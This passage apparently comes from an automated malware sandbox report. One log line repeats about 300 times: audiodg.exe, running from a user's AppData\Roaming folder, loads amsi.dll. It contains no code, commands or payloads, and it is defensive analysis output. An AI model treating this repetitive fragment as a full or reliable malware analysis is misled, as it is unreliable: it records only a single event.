                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
